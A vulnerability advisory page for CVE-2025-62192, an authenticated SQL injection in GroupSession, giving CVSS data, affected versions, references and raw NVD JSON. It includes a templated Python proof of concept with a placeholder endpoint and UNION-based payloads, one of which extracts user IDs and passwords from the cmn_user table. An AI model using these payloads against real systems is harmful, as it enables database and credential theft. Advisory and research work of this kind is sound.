Security Vulnerability Report
CVE-2025-62192 CVSS 5.4 MEDIUM

CVE-2025-62192

Published: 2025-12-12 05:16:11
Last Modified: 2026-02-17 15:18:18

Description

SQL Injection vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If exploited, information stored in the database may be obtained or altered by an authenticated user.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:groupsession:groupsession:*:*:*:*:free:*:*:* - VULNERABLE
cpe:2.3:a:groupsession:groupsession:*:*:*:*:zion:*:*:* - VULNERABLE
cpe:2.3:a:groupsession:groupsession:*:*:*:*:bycloud:*:*:* - VULNERABLE
GroupSession Free edition < 5.3.0
GroupSession byCloud < 5.3.3
GroupSession ZION < 5.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62192 SQL Injection PoC # Target: GroupSession Free < 5.3.0, byCloud < 5.3.3, ZION < 5.3.2 # Type: SQL Injection via authenticated user import requests import sys TARGET_URL = "http://target-groupsession.com/gsession/" LOGIN_URL = TARGET_URL + "login.do" VULN_ENDPOINT = TARGET_URL + "some_endpoint.do" # Replace with actual vulnerable endpoint def login(session, username, password): """Authenticate to GroupSession""" data = { "usr_uid": username, "usr_psw": password } resp = session.post(LOGIN_URL, data=data) return "login" not in resp.url def exploit_sqli(session, payload): """Send SQL injection payload""" headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "param": payload # Vulnerable parameter } resp = session.post(VULN_ENDPOINT, data=data, headers=headers) return resp.text def extract_db_version(session): """Extract database version using UNION-based injection""" payload = "' UNION SELECT NULL,version(),NULL--" return exploit_sqli(session, payload) def extract_users(session): """Extract user credentials""" payload = "' UNION SELECT usr_uid,usr_psw,NULL FROM cmn_user--" return exploit_sqli(session, payload) def main(): if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() if login(session, username, password): print("[+] Login successful") print("[*] Extracting database version...") version = extract_db_version(session) print(f"[+] Database version: {version}") print("[*] Extracting user data...") users = extract_users(session) print(f"[+] User data: {users}") else: print("[-] Login failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62192", "sourceIdentifier": "[email protected]", "published": "2025-12-12T05:16:10.950", "lastModified": "2026-02-17T15:18:18.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If exploited, information stored in the database may be obtained or altered by an authenticated user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:free:*:*:*", "versionEndExcluding": "5.3.0", "matchCriteriaId": "32599C61-0938-49C5-8416-44C3DF7B144A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:zion:*:*:*", "versionEndExcluding": "5.3.2", "matchCriteriaId": "46F7CACE-2448-4A90-9192-B6270B33E393"}, {"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:bycloud:*:*:*", "versionEndExcluding": "5.3.3", "matchCriteriaId": "DD4CD8BC-39CB-44FF-A4D8-22C1B38ED223"}]}]}], "references": [{"url": "https://groupsession.jp/info/info-news/security20251208", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://jvn.jp/en/jp/JVN19940619/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}